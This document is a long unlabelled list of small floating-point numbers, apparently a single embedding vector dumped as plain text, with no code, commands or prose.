-0.006167135667055845, -0.013332461006939411, -0.0005353052983991802, 0.05081691965460777, 0.006910542491823435, 0.02018716000020504, 0.005095652770251036, 0.009123312309384346, 0.022099776193499565, 0.0190842654556036, -0.03599066287279129, 0.024138037115335464, 0.010463538579642773, -0.0015539994928985834, -0.037386734038591385, -0.038280218839645386, 0.03367318958044052, -0.052883099764585495, 0.016166482120752335, -0.03953668102622032, -0.003957855980843306, -0.0034622515086084604, 0.019335558637976646, -0.015677856281399727, 0.03169076889753342, -0.03691206872463226, 0.0017424689140170813, -0.012411055155098438, -0.046293653547763824, -0.028549615293741226, -0.006924503017216921, -0.036632854491472244, -0.017967410385608673, 0.027265232056379318, -0.0438365712761879, -0.007413127459585667, 0.032137513160705566, -0.023649411275982857, 0.02543638087809086, -0.00855790451169014, 0.020061513409018517, -0.02998756617307663, -0.020899156108498573, -0.0014894313644617796, 0.017785921692848206, -0.024417249485850334, -0.041044432669878006, 0.02984795905649662, 0.03392448276281357, -0.006477761082351208, 0.012983443215489388, -0.022378988564014435, 0.0030573916155844927, -0.00933272298425436, 0.06656458228826523, -0.01969853602349758, 0.0008590188226662576, 0.01563597470521927, -0.025213008746504784, 0.005294592585414648, 0.01994982920587063, 0.008390375413000584, 0.00376589666120708, 0.0026752175763249397, 0.013297558762133121, 0.020954998210072517, 0.024347446858882904, -0.011133652180433273, 0.0011159827699884772, 0.015761621296405792, 0.021304015070199966, -0.01622232422232628, 0.026106493547558784, -0.013102109543979168, -0.024110114201903343, -0.019265754148364067, -0.038252294063568115, 0.04503719136118889, -0.0663970485329628, -0.0032057238277047873, -0.052464280277490616, 0.027139585465192795, -0.008250769227743149, 0.018344348296523094, -0.03420369699597359, 0.0012774033239111304, -0.018302466720342636, 0.0001832340785767883, -0.04436707869172096, -0.009465348906815052, 0.05017472803592682, -0.005242239683866501, -0.0095421327278018, 0.002622864907607436, -0.015021704137325287, -0.0278795026242733, -0.01721353270113468, 0.066787950694561, -0.026441549882292747, -0.05193377286195755, -0.007769125048071146, 0.037833474576473236, -0.008676569908857346, 0.01763235405087471, 0.0174927469342947, 0.00929782073944807, -0.017073925584554672, 0.008627708069980145, 0.0415470190346241, 0.002127260435372591, -0.017688196152448654, 0.006645289249718189, 0.014644766226410866, 0.015314878895878792, 0.05293894559144974, 0.01645965501666069, -0.0034727221354842186, -0.0032057238277047873, -0.01368147786706686, -0.007811007089912891, 0.037526339292526245, 0.03437122330069542, 0.02049429528415203, 0.0183862317353487, -0.03643740713596344, -0.010023776441812515, -0.0067046224139630795, 0.005779726430773735, -0.03392448276281357, 0.0342874601483345, -0.00990511104464531, -0.008648648858070374, -0.05252012237906456, 0.030071331188082695, 0.025310734286904335, -0.012236546725034714, 0.0026717274449765682, 0.020968958735466003, 0.006167135667055845, 0.018065135926008224, 0.016641145572066307, 0.014260847121477127, 0.0014196278061717749, -0.013883908279240131, 0.009919071570038795, -0.010247147642076015, -0.061538729816675186, 0.0591374896466732, -0.022588400170207024, 0.0408489853143692, -0.01791156828403473, -0.0001100495137507096, -0.05023057013750076, 0.016934318467974663, -0.0016403812915086746, 0.004861811175942421, 0.026218179613351822, -0.004425539169460535, -0.004460440948605537, -0.013276617974042892, 0.015468446537852287, 0.033449817448854446, 0.010700870305299759, 0.0011447767028585076, 0.00007520231883972883, 0.0028776475228369236, -0.004568636417388916, -0.019586849957704544, 0.01213184092193842, 0.007908731698989868, 0.018581680953502655, -0.022351067513227463, -0.03442706540226936, -0.019712496548891068, 0.0195310078561306, 0.0025565517134964466, 0.013088149018585682, -0.010219226591289043, -0.02173679694533348, 0.004355736076831818, 0.02218353934586048, 0.03546015918254852, -0.025925004854798317, 0.04785725101828575, 0.007468970026820898, -0.012411055155098438, -0.025799358263611794, 0.014616844244301319, -0.031523242592811584, 0.0555635541677475, 0.02011735737323761, -0.04012302681803703, 0.02794930525124073, 0.005336474627256393, -0.017688196152448654, 0.010519381612539291, 0.007475950755178928, 0.006610387470573187, -0.013632616028189659, -0.012920619919896126, 0.017311258241534233, -0.045120954513549805, -0.0008930480107665062, -0.030964814126491547, 0.012739131227135658, 0.008488100953400135, 0.033142682164907455, -0.03361734747886658, 0.026832450181245804, 0.013339441269636154, 0.007510852068662643, -0.037247125059366226, -0.02122025191783905, 0.0005798049969598651, -0.003237135475501418, 0.0009720131638459861, -0.0076225376687943935, -0.020787470042705536, -0.0063486248254776, -0.056680407375097275, 0.014281787909567356, -0.03442706540226936, 0.03733089193701744, 0.006945444270968437, 0.04202168434858322, 0.004390637390315533, -0.02715354599058628, -0.014016535133123398, 0.024473093450069427, 0.016361931338906288, 0.03936915099620819, -0.004212638828903437, 0.018176820129156113, 0.028507733717560768, -0.027614248916506767, -0.0390620157122612, 0.02363545075058937, -0.005688982084393501, 0.035488080233335495, 0.026176298037171364, 0.016445694491267204, 0.005594747141003609, 0.017995331436395645, -0.011294200085103512, -0.016850555315613747, -0.0072944615967571735, -0.01449119858443737, 0.03202582895755768, -0.00843923818320036, -0.017576511949300766, -0.00238553318195045, 0.033142682164907455, -0.03978797048330307, 0.04068145528435707, 0.032835546880960464, -0.009793424978852272, 0.006334663834422827, 0.022490674629807472, 0.028759025037288666, 0.011294200085103512, -0.03297515586018562, -0.014910019002854824, 0.0190842654556036, 0.03149532154202461, 0.008962764404714108, 0.008816177025437355, 0.004778046626597643, 0.004024169407784939, 0.01918199099600315, 0.004125384613871574, -0.002265122253447771, 0.005887921899557114, -0.0022005541250109673, 0.05210130289196968, -0.041491176933050156, -0.010798594914376736, 0.02843792922794819, 0.0019544968381524086, -0.026832450181245804, -0.012034116312861443, 0.029959645122289658, 0.02187640406191349, -0.021038763225078583, 0.003992757759988308, 0.004568636417388916, 0.009667779318988323, 0.015077547170221806, -0.005633139051496983, 0.00007149401062633842, 0.011901489458978176, 0.004484872333705425, 0.0004794625274371356, 0.016375891864299774, -0.0073014418594539165, -0.017953449860215187, -0.006924503017216921, -0.0170460045337677, 0.0122505072504282, 0.0020469864830374718, -0.003006784012541175, 0.011322121135890484, 0.015831423923373222, -0.018930697813630104, -0.021304015070199966, 0.0215692687779665, -0.020075475797057152, 0.005004907958209515, 0.006498701870441437, -0.011440787464380264, -0.015091507695615292, -0.007713282480835915, 0.028786946088075638, 0.007797046564519405, -0.008997665718197823, -0.011245337314903736, 0.03258425369858742, -0.060366030782461166, 0.011608315631747246, 0.00003588334220694378, -0.0057832165621221066, 0.0037240146193653345, 0.009325741790235043, 0.030936893075704575, -0.012550662271678448, -0.003846170613542199, 0.00018214339797850698, 0.03169076889753342, -0.04271971806883812, -0.003080077702179551, -0.024445172399282455, 0.01835831068456173, 0.01697620190680027, 0.0033558013383299112, 0.010777654126286507, -0.01506358664482832, 0.0014205004554241896, -0.018400192260742188, -0.01371638011187315, -0.00943742785602808, -0.04916955530643463, -0.01257858332246542, 0.024165958166122437, 0.01266234740614891, 0.025548066943883896, -0.011301180347800255, 0.009702680632472038, 0.014065396972000599, 0.011329101398587227, 0.021108565852046013, 0.05606614053249359, -0.024026351049542427, -0.0017747529782354832, -0.011259297840297222, 0.01166415773332119, 0.01946120522916317, 0.0018602622440084815, -0.03364526852965355, -0.017758000642061234, 0.02867526188492775, 0.01666906662285328, 0.000002259750772282132, -0.0199777502566576, 0.025938965380191803, 0.03668869659304619, 0.020927077159285545, -0.0161525197327137, -0.04232881963253021, -0.043808650225400925, 0.030322622507810593, -0.03696791082620621, 0.015217154286801815, 0.0005619178409688175, -0.015622014179825783, -0.050398096442222595, -0.008425277657806873, 0.023802978917956352, 0.04459045082330704, -0.015440525487065315, 0.0042580110020935535, -0.012822895310819149, 0.0019684575963765383, 0.004195187706500292, -0.007964574731886387, 0.01697620190680027, 0.003301703603938222, 0.011447767727077007, -0.02001963183283806, -0.01994982920587063, 0.021932246163487434, 0.02429160475730896, 0.008488100953400135, -0.0024972187820822, -0.01845603436231613, 0.017576511949300766, -0.0036123290192335844, -0.004620988853275776, -0.007824967615306377, 0.0024431210476905107, 0.009779464453458786, -0.004697772674262524, 0.03127194941043854, 0.005182906985282898, 0.02478022873401642, -0.0019318107515573502, -0.03266802057623863, -0.02122025191783905, 0.005116593558341265, 0.007238618563860655, -0.005476081278175116, 0.016208363696932793, -0.03266802057623863, -0.008704490959644318, -0.005277141463011503, -0.011706040240824223, 0.03551600128412247, -0.010107540525496006, -0.017101848497986794, -0.005552865099161863, -0.017436904832720757, -0.02626006118953228, 0.01009358000010252, 0.03774971142411232, 0.013751281425356865, 0.02501755952835083, 0.00980040617287159, -0.0004467421385925263, -0.020452413707971573, -0.035041335970163345, -0.02815871499478817, -0.00360185862518847, 0.017101848497986794, 0.0206757839769125, 0.032835546880960464, -0.02263028174638748, 0.01936347968876362, 0.01638985238969326, -0.03381279483437538, -0.012187683954834938, 0.0433339886367321, 0.00952119193971157, -0.021248172968626022, 0.007915711961686611, 0.0318024568259716, 0.002629845403134823, 0.0002659075544215739, -0.0025303754955530167, -0.007559714838862419, 0.0062474096193909645, -0.012983443215489388, -0.011999214999377728, 0.013032305985689163, 0.03543223440647125, 0.01894465833902359, 0.015356761403381824, 0.01967061497271061, 0.025994807481765747, 0.015342800877988338, 0.006198547314852476, 0.02394258603453636, -0.007378225680440664, -0.01414916105568409, -0.015984991565346718, 0.032137513160705566, -0.02515716664493084, -0.0035547411534935236, 0.0122505072504282, 0.010512401349842548, -0.01798137091100216, 0.012264467775821686, 0.021345898509025574, 0.015691816806793213, 0.03719128295779228, 0.017157690599560738, -0.0019736927933990955, 0.01067992951720953, -0.016026875004172325, -0.003024234902113676, 0.01009358000010252, -0.035488080233335495, 0.009632877074182034, 0.012564622797071934, -0.027558404952287674, 0.0022511614952236414, -0.0061252536252141, 0.009053508751094341, 0.019656654447317123, -0.047633882611989975, -0.002509434474632144, -0.008536962792277336, -0.008899941109120846, 0.012285408563911915, -0.019824182614684105, -0.009604956023395061, -0.008153043687343597, 0.006153175141662359, 0.035627685487270355, -0.012599524110555649, -0.03177453577518463, 0.00701175769791007, -0.03116026520729065, 0.002930000191554427, -0.03116026520729065, 0.007168815471231937, 0.0018166350200772285, -0.011964312754571438, -0.027753856033086777, 0.00935366377234459, -0.0079506142064929, -0.02836812660098076, -0.011671137996017933, 0.0007434068247675896, -0.020480334758758545, -0.0033488210756331682, -0.016403812915086746, 0.013486028648912907, 0.01856772042810917, 0.0042649912647902966, 0.011273258365690708, 0.018846934661269188, 0.007161834742873907, -0.012871758081018925, 0.009207076393067837, -0.005004907958209515, 0.007908731698989868, -0.023077024146914482, 0.027823658660054207, -0.03294723480939865, -0.0059263138100504875, 0.014588923193514347, -0.04123988375067711, -0.009632877074182034, -0.01763235405087471, -0.013402264565229416, -0.007350304163992405, -0.00896974466741085, 0.0017407237319275737, -0.007482931017875671, -0.006903562229126692, 0.019475165754556656, -0.022728007286787033, -0.01090330071747303, 0.007455009501427412, -0.0065685054287314415, -0.00886503979563713, -0.0120271360501647, 0.016375891864299774, -0.011245337314903736, -0.028312282636761665, 0.0017590471543371677, 0.01735313981771469, -0.0036402505356818438, 0.013772222213447094, -0.023077024146914482, 0.02004755288362503, -0.01337434258311987, -0.019866064190864563, 0.008013437502086163, 0.03143947944045067, -0.028731103986501694, 0.0030277250334620476, 0.02677660621702671, -0.013548851944506168, -0.01604083552956581, 0.033310212194919586, 0.008823157288134098, 0.011929411441087723, 0.015217154286801815, 0.0002892480988521129, -0.004432519897818565, 0.019754379987716675, 0.01746482588350773, -0.018860895186662674, 0.008139083161950111, -0.02926160953938961, 0.01514735072851181, -0.010044718161225319, 0.0071897562593221664, -0.020270925015211105, 0.010463538579642773, 0.001851536799222231, -0.002460571937263012, 0.010526361875236034, 0.01732521876692772, -0.010700870305299759, 0.0035844077356159687, -0.011391924694180489, -0.009165193885564804, 0.023090984672307968, -0.02598084695637226, -0.018553759902715683, -0.007650459185242653, -0.04520472139120102, -0.01608271710574627, -0.02349584363400936, 0.012404074892401695, 0.01114761270582676, 0.026385707780718803, -0.011056868359446526, -0.037973083555698395, -0.025045480579137802, 0.015957070514559746, -0.013765241950750351, 0.016934318467974663, -0.01904238387942314, -0.020005671307444572, -0.019503086805343628, -0.0037484457716345787, -0.01145474798977375, -0.012857797555625439, -0.020340727642178535, 0.0039892676286399364, 0.020619941875338554, 0.0013698928523808718, 0.02656719647347927, -0.03878280147910118, 0.05656872317194939, 0.03492965176701546, -0.019419321790337563, 0.009737582877278328, -0.054530464112758636, 0.029875880107283592, -0.053022708743810654, -0.030545994639396667, 0.001287001301534474, -0.0037240146193653345, 0.025059441104531288, -0.027181467041373253, -0.003320899559184909, 0.0067116026766598225, 0.0034744672011584044, -0.007790066301822662, 0.004062561318278313, -0.006264860276132822, -0.014393473044037819, -0.020145278424024582, 0.011070828884840012, 0.012041096575558186, -0.01214580237865448, 0.0029457060154527426, 0.0038426804821938276, -0.0032598215620964766, -0.004313854034990072, -0.00004867155439569615, -0.013702419586479664, -0.006024038419127464, -0.0037309948820620775, 0.01435159146785736, 0.01887485571205616, -0.007109482306987047, -0.03850358724594116, 0.01243897620588541, -0.006770935375243425, 0.01086839847266674, 0.0011692079715430737, -0.006345134694129229, -0.03294723480939865, -0.02415199764072895, -0.00020319351460784674, 0.004380166996270418, -0.02940121665596962, -0.007008267566561699, 0.019684575498104095, -0.02260236069560051, -0.004701262805610895, -0.020829351618885994, 0.02018716000020504, 0.014979822561144829, 0.0045791068114340305, 0.028005147352814674, 0.011405885219573975, 0.01946120522916317, 0.03470627963542938, 0.009709660895168781, -0.006051959935575724, 0.0022075343877077103, -0.006250899750739336, 0.021304015070199966, 0.02646947279572487, 0.017590472474694252, 0.001304452191106975, -0.03425953909754753, 0.03244464844465256, 0.006338153965771198, -0.006847719196230173, -0.04171454906463623, -0.012843837030231953, 0.007762144785374403, -0.018581680953502655, 0.021066684275865555, -0.017688196152448654, 0.019335558637976646, 0.02166699431836605, -0.00896974466741085, 0.009290840476751328, 0.018372271209955215, 0.022728007286787033, 0.011573413386940956, 0.020996879786252975, -0.01753462851047516, -0.0295687448233366, 0.0006225596298463643, 0.01112667191773653, -0.006627838592976332, -0.024319525808095932, 0.017381060868501663, 0.005032829474657774, -0.010526361875236034, 0.00011822961096186191, 0.04724298045039177, 0.011461728252470493, -0.04040224105119705, 0.03177453577518463, -0.02353772707283497, 0.017995331436395645, 0.004970006179064512, 0.015468446537852287, 0.016515498980879784, 0.0269860178232193, 0.02525489218533039, -0.006886111106723547, -0.00841829739511013, 0.025715595111250877, -0.0023070042952895164, 0.02767009101808071, 0.05768558010458946, 0.008913901634514332, -0.040765222162008286, 0.006948934402316809, -0.0012625700328499079, -0.019265754148364067, -0.003169076982885599, 0.00397530710324645, -0.00405558105558157, -0.0031114891171455383, 0.020815391093492508, 0.017827803269028664, -0.003964836709201336, 0.0028095892630517483, 0.044674213975667953, 0.003395938314497471, 0.0011316885938867927, -0.0039962478913366795, 0.0038357002194970846, -0.00940252561122179, -0.01669698767364025, 0.0118037648499012, 0.011273258365690708, 0.019503086805343628, -0.014588923193514347, -0.006387016735970974, -0.008536962792277336, 0.004575616680085659, -0.010742752812802792, 0.009046528488397598, -0.025031520053744316, 0.006551054771989584, 0.0093187615275383, -0.018065135926008224, 0.009269899688661098, -0.023816941305994987, 0.0007892153807915747, 0.006331173703074455, 0.004083502572029829, -0.03557184338569641, 0.00455467589199543, -0.0025303754955530167, 0.006219488102942705, -0.025143206119537354, -0.013290578499436378, 0.014951901510357857, -0.0035180943086743355, -0.005832078866660595, 0.026343826204538345, 0.031076500192284584, -0.013849006034433842, 0.0027432760689407587, -0.006910542491823435, 0.01746482588350773, 0.005130554083734751, -0.002134240698069334, 0.00990511104464531, 0.006345134694129229, -0.0050223590806126595, -0.007081560790538788, -0.009409506805241108, -0.023663373664021492, 0.04802478104829788, -0.006425408646464348, -0.008529982529580593, 0.00929782073944807, -0.03537639230489731, -0.03074144385755062, -0.00807625986635685, -0.007845908403396606, -0.01904238387942314, 0.006421918515115976, -0.022057892754673958, 0.001800929312594235, 0.0057832165621221066, -0.00097899348475039, -0.005441179499030113, -0.006784896366298199, 0.030378466472029686, 0.07466178387403488, 0.017660275101661682, -0.003457016311585903, 0.017241453751921654, -0.013814104720950127, 0.010994045063853264, 0.004446480423212051, -0.015119429677724838, 0.00006009641583659686, -0.022169578820466995, 0.02391466498374939, 0.0011281984625384212, -0.015091507695615292, 0.00860676635056734, 0.0347900427877903, -0.01901446282863617, -0.014533080160617828, 0.007985515519976616, 0.023523766547441483, -0.013081168755888939, -0.002396003808826208, 0.0022895534057170153, -0.005018868949264288, -0.008153043687343597, -0.011503609828650951, 0.016543420031666756, 0.009695700369775295, -0.007057129871100187, -0.002334925811737776, -0.01235521212220192, 0.031830377876758575, -0.010686909779906273, 0.004743145313113928, -0.03060183674097061, 0.008704490959644318, 0.004875771701335907, 0.02722334861755371, -0.004757105838507414, -0.006809327285736799, -0.013695438392460346, -0.021401740610599518, -0.007399166934192181, -0.0032598215620964766, 0.012103919871151447, 0.0015662150690332055, 0.0007599851815029979, 0.006048469804227352, -0.03129987046122551, -0.05676417425274849, 0.009207076393067837, 0.006212507840245962, -0.01214580237865448, -0.011915450915694237, -0.006886111106723547, -0.013150971382856369, -0.01711580902338028, -0.018344348296523094, 0.005517963320016861, 0.009262919425964355, 0.016934318467974663, -0.020536178722977638, -0.008041358552873135, -0.007238618563860655, -0.0072805010713636875, 0.006634818855673075, 0.011182514019310474, -0.021625110879540443, -0.0011822960805147886, -0.008809196762740612, 0.04431123659014702, 0.0012878738343715668, 0.007713282480835915, -0.02660907804965973, 0.006268350873142481, 0.0179394893348217, 0.05020264908671379, -0.003902013413608074, -0.003244115738198161, 0.0031289400067180395, -0.01042165607213974, -0.006292781792581081, 0.004306873306632042, 0.002158672083169222, 0.017967410385608673, -0.027753856033086777, 0.013018345460295677, -0.006460309959948063, 0.02429160475730896, 0.00855790451169014, -0.004641930107027292, -0.005751804914325476, -0.00405558105558157, 0.030378466472029686, 0.05458630621433258, 0.03512509912252426, 0.05028641223907471, 0.023956546559929848, 0.00673603406175971, -0.01962873339653015, -0.009444408118724823, -0.004858320578932762, 0.014561002142727375, -0.010756713338196278, 0.0057762362994253635, -0.018581680953502655, 0.010268089361488819, 0.004617498721927404, -0.00709203165024519, -0.015887267887592316, -0.0065685054287314415, -0.028033070266246796, 0.006031018681824207, -0.0006753484485670924, 0.009786444716155529, -0.012466898187994957, 0.03071352280676365, 0.0265392754226923, 0.03333813324570656, 0.01866544596850872, 0.01559409312903881, 0.00030451759812422097, -0.008271710015833378, -0.002209279453381896, 0.0027642170898616314, 0.018414152786135674, 0.006854699924588203, -0.004739654716104269, -0.00797155499458313, 0.03467835858464241, 0.017241453751921654, 0.027530483901500702, -0.007685360964387655, -0.010624086484313011, -0.0035111140459775925, 0.007482931017875671, -0.026790568605065346, -0.008027398027479649, 0.0033715071622282267, -0.00962589681148529, 0.003682132577523589, -0.006914032623171806, 0.03060183674097061, -0.02070370689034462, 0.035041335970163345, 0.0012835111701861024, 0.011510590091347694, 0.005053770262748003, -0.011901489458978176, -0.010924241505563259, 0.022002050653100014, -0.02060598134994507, -0.030797285959124565, -0.008481120690703392, 0.012571603059768677, 0.017199572175741196, -0.018442073836922646, 0.010833497159183025, -0.021820561960339546, 0.007029208354651928, 0.014156141318380833, 0.015984991565346718, 0.0010453067952767015, 0.003420369466766715, -0.009367624297738075, 0.021694915369153023, 0.01967061497271061, -0.01109176967293024, -0.005887921899557114, -0.04171454906463623, -0.01017734408378601, 0.023551687598228455, 0.023733176290988922, -0.03967628628015518, 0.009151233360171318, 0.016334010288119316, -0.0040939729660749435, 0.009618916548788548, 0.03688414767384529, 0.013360382057726383, 0.0181907806545496, 0.007538773585110903, 0.0010025522205978632, -0.0147843724116683, -0.006156665273010731, -0.016264205798506737, -0.013109089806675911, -0.025966886430978775, -0.005273651331663132, -0.02035468816757202, -0.001369020319543779, 0.006017058156430721, 0.0065685054287314415, -0.013262657448649406, 0.0124738784506917, -0.02804703079164028, -0.026720764115452766, 0.0023680822923779488, 0.008920881897211075, -0.001813144888728857, -0.004059071186929941, -0.006652269512414932, -0.00005971467908238992, 0.015468446537852287, 0.03294723480939865, -0.01549636758863926, -0.04891826584935188, 0.0016761556034907699, -0.00045023232814855874, 0.004802478011697531, 0.020145278424024582, -0.008816177025437355, 0.03861527517437935, 0.009046528488397598, -0.04364112392067909, 0.022211460396647453, 0.010875378735363483, -0.0007944506360217929, -0.014421395026147366, 0.025631830096244812, -0.0018881835276260972, -0.0029334903229027987, 0.028926553204655647, -0.006020548287779093, -0.018539799377322197, -0.019852103665471077, 0.022965338081121445, 0.005668040830641985, -0.01967061497271061, -0.0015094998525455594, 0.024975677952170372, -0.011280238628387451, 0.024068232625722885, 0.01261348556727171, 0.0010767183266580105, -0.021653033792972565, 0.018693367019295692, -0.02222542092204094, -0.0042370702140033245, -0.02584123983979225, -0.00919311586767435, 0.010693890042603016, 0.0026769626419991255, -0.03378487378358841, 0.010861418209969997, -0.023300394415855408, -0.00024562093312852085, -0.013409244827926159, 0.004617498721927404, -0.028898632153868675, -0.002320965053513646, -0.012062037363648415, -0.012299370020627975, 0.0003518530575092882, 0.01967061497271061, 0.022546516731381416, 0.014065396972000599, -0.01638985238969326, 0.00014396963524632156, 0.010205266065895557, -0.00554588483646512, -0.004561656154692173, 0.02471042424440384, 0.0014946665614843369, -0.012418035417795181, -0.008257749490439892, 0.052575964480638504, -0.0020539667457342148, -0.009346683509647846, 0.016124598681926727, -0.00010819535964401439, 0.019852103665471077, 0.025687674060463905, 0.0065685054287314415, -0.010379774495959282, -0.013060227036476135, 0.014686647802591324, 0.017925528809428215, -0.014951901510357857, -0.010030756704509258, -0.003170822048559785, -0.0034168793354183435, -0.0009772484190762043, -0.038978252559900284, 0.011601335369050503, 0.016054796054959297, -0.026595117524266243, -0.023384159430861473, 0.01880505122244358, 0.006376545876264572, 0.0033523112069815397, 0.009486290626227856, 0.004449970554560423, -0.016417773440480232, 0.0028654320631176233, 0.013765241950750351, 0.0050432998687028885, -0.011566433124244213, 0.019963789731264114, -0.0034535261802375317, -0.039704207330942154, -0.008627708069980145, 0.03554392233490944, -0.019126147031784058, 0.01742294430732727, -0.01440743450075388, -0.016306087374687195, 0.021164409816265106, -0.012634426355361938, -0.002561786910519004, 0.00331217423081398, -0.0008899940876290202, -0.006802347023040056, 0.006432388909161091, 0.005095652770251036, -0.02515716664493084, 0.0008293523569591343, -0.031076500192284584, -0.0015784307615831494, 0.0007482058135792613, -0.007259559817612171, 0.01316493283957243, 0.017925528809428215, -0.020536178722977638, -0.013520929962396622, -0.013109089806675911, -0.008313591592013836, 0.01870732754468918, -0.014854175969958305, 0.009165193885564804, -0.0365770123898983, 0.03236088529229164, 0.040011342614889145, 0.018693367019295692, 0.00860676635056734, -0.02815871499478817, -0.011412865482270718, 0.011692079715430737, 0.0063486248254776, -0.0036402505356818438, 0.00587396090850234, -0.05941670387983322, 0.012348231859505177, 0.01983814314007759, 0.007081560790538788, 0.022476714104413986, -0.005451650358736515, 0.009842287749052048, 0.025282813236117363, -0.006931483745574951, -0.01859564147889614, -0.00864166859537363, -0.005074711516499519, 0.024863991886377335, 0.03582313656806946, 0.025422420352697372, 0.001926575438119471, -0.00397530710324645, 0.00557380635291338, 0.0199777502566576, -0.005556355230510235, 0.012515760026872158, 0.016724908724427223, -0.02445913292467594, -0.003551251022145152, 0.01807909645140171, 0.02464062161743641, -0.010386754758656025, 0.031942062079906464, -0.01551032904535532, 0.00623693922534585, -0.004425539169460535, -0.022378988564014435, 0.005552865099161863, -0.0035844077356159687, -0.027544444426894188, 0.002875902457162738, 0.004847850184887648, -0.011943371966481209, -0.00413934513926506, -0.0011526296148076653, -0.003919464070349932, 0.015217154286801815, -0.013206814415752888, -0.01418406330049038, -0.019447244703769684, -0.0015042645391076803, -0.0009214056772179902, -0.0381685309112072, -0.001951006706804037, -0.023440001532435417, 0.013548851944506168, -0.008083241060376167, -0.017855724319815636, 0.024026351049542427, 0.01174792181700468, 0.019754379987716675, 0.015077547170221806, -0.006146194413304329, 0.006345134694129229, 0.005675021093338728, 0.0316070057451725, -0.030350543558597565, -0.011943371966481209, 0.010882358998060226, 0.007692341227084398, 0.006715092808008194, -0.02612045407295227, -0.007182775996625423, -0.005305062979459763, -0.032137513160705566, -0.016710948199033737, -0.015133390203118324, -0.009807386435568333, 0.01064502727240324, -0.03085312992334366, -0.009158213622868061, -0.0033854676876217127, 0.011740941554307938, 0.02853565476834774, 0.014037475921213627, 0.0007342451135627925, 0.013416225090622902, -0.01967061497271061, 0.003193508367985487, -0.007315402384847403, -0.01894465833902359, -0.02283969148993492, 0.027684051543474197, -0.022378988564014435, -0.010289030149579048, 0.021164409816265106, 0.015622014179825783, 0.02260236069560051, -0.004013699013739824, 0.028926553204655647, -0.012585563585162163, -0.01873524859547615, 0.012257487513124943, 0.01618044264614582, -0.010631066747009754, 0.01580350287258625, 0.014323669485747814, -0.002485003089532256, -0.026525314897298813, -0.006153175141662359, -0.006380036007612944, -0.014547040686011314, 0.020927077159285545, -0.01587330736219883, -0.011447767727077007, 0.0199777502566576, 0.02401239052414894, 0.0020609472412616014, 0.005699452478438616, 0.003954365849494934, -0.02166699431836605, -0.0013009619433432817, -0.011503609828650951, -0.0032545863650739193, 0.015929149463772774, 0.005772746168076992, -0.014965862035751343, -0.010686909779906273, 0.008920881897211075, 0.0051933773793280125, 0.00021246427786536515, -0.003940405324101448, 0.03297515586018562, 0.016068756580352783, -0.0016159501392394304, -0.0032772724516689777, 0.0052003576420247555, 0.013053246773779392, 0.010589185170829296, 0.007922692224383354, 0.0022232402116060257, -0.008320572786033154, 0.0053504351526498795, -0.007043168880045414, -0.00995397288352251, 0.016780750826001167, 0.01349300891160965, -0.00888598058372736, -0.016724908724427223, 0.0070326984860002995, -0.0017154200468212366, 0.006722073070704937, 0.020131317898631096, 0.010798594914376736, 0.003017254639416933, -0.01221560500562191, -0.003559976350516081, -0.010184324346482754, 0.0000938529337872751, 0.010114521719515324, 0.010240167379379272, -0.001775625511072576, 0.01918199099600315, -0.017478786408901215, -0.000008111925126286224, 0.007427087984979153, -0.003469232004135847, -0.01354187075048685, -0.020968958735466003, 0.0024309055879712105, -0.0013698928523808718, -0.027893463149666786, 0.002903823973610997, 0.00617760606110096, -0.008711472153663635, -0.013171913102269173, -0.01732521876692772, -0.03758218139410019, 0.00800645723938942, 0.006613877601921558, -0.008132102899253368, 0.0018707327544689178, 0.003251096233725548, 0.010770673863589764, 0.0008057936793193221, -0.0013672752538695931, 0.007817987352609634, 0.013137010857462883, -0.016501538455486298, -0.011552472598850727, 0.010665968991816044, 0.019405361264944077, 0.0021412211935967207, -0.018763169646263123, -0.010742752812802792, -0.02670680359005928, -0.011580393649637699, -0.006917522754520178, -0.0067185829393565655, -0.008913901634514332, 0.016166482120752335, 0.005015378352254629, -0.005668040830641985, -0.0002591453376226127, -0.012327291071414948, 0.002226730342954397, -0.012822895310819149, 0.010582204908132553, 0.00019097790936939418, -0.01506358664482832, -0.012041096575558186, 0.0005510110640898347, -0.019572889432311058, -0.02101084217429161, 0.026343826204538345, -0.023132866248488426, -0.011789804324507713, 0.0048722815699875355, -0.0003573064459487796, 0.010309970937669277, 0.01222956646233797, 0.023970508947968483, -0.005863490514457226, -0.007845908403396606, 0.0009362389100715518, -0.012362192384898663, 0.008781274780631065, -0.0014266081852838397, 0.03174661472439766, 0.007482931017875671, 0.01435159146785736, 0.002579237800091505, 0.0005073838983662426, 0.031551163643598557, -0.03554392233490944, 0.028898632153868675, -0.011796784587204456, 0.00029731911490671337, 0.01313003059476614, 0.014323669485747814, 0.010023776441812515, 0.025715595111250877, 0.007824967615306377, 0.009995855391025543, -0.02487795241177082, 0.013555832207202911, 0.0019108697306364775, -0.0038252295926213264, 0.004017189145088196, 0.012082979083061218, -0.0028950984124094248, 0.010135462507605553, -0.012418035417795181, -0.01880505122244358, -0.0199777502566576, -0.0023384159430861473, 0.02663700096309185, -0.00014669632946606725, 0.0032406256068497896, 0.01559409312903881, -0.004669851623475552, 0.004020679276436567, -0.013751281425356865, 0.003678642213344574, 0.004949065390974283, 0.008823157288134098, -0.01294156163930893, -0.020159238949418068, -0.0019614771008491516, -0.012669327668845654, -0.018832974135875702, 0.023509806022047997, -0.028116833418607712, -0.0057901968248188496, -0.014239905402064323, 0.015622014179825783, -0.0009126802324317396, 0.0028026090003550053, -0.017297297716140747, -0.0058355689980089664, -0.006666230503469706, -0.02412407472729683, -0.006596426945179701, 0.00907444953918457, -0.007650459185242653, 0.01239011436700821, -0.0039892676286399364, -0.018930697813630104, -0.01625024527311325, 0.010323931463062763, -0.0002475841320119798, 0.0029893331229686737, -0.024822110310196877, -0.005517963320016861, -0.0030730972066521645, 0.011538512073457241, 0.006313723046332598, 0.002636825665831566, 0.010247147642076015, -0.0057901968248188496, 0.006945444270968437, 0.011517571285367012, -0.03487380966544151, -0.01559409312903881, -0.03129987046122551, 0.006128743756562471, -0.009179155342280865, -0.0004436882445588708, 0.01447723712772131, -0.0102122463285923, -0.010672949254512787, -0.0062474096193909645, -0.004603538196533918, -0.0388665646314621, 0.02954082377254963, -0.015887267887592316, 0.02060598134994507, -0.011384944431483746, -0.009151233360171318, -0.021415701135993004, -0.009584015235304832, 0.025994807481765747, -0.014135200530290604, -0.046907924115657806, 0.01359771378338337, 0.016780750826001167, 0.009674759581685066, -0.015998952090740204, -0.005706432741135359, 0.016655106097459793, -0.009458368644118309, 0.0010941692162305117, 0.010938202030956745, 0.0031847828067839146, 0.018693367019295692, 0.01807909645140171, -0.022197499871253967, -0.024389328435063362, -0.004676831886172295, -0.011217416264116764, -0.012585563585162163, 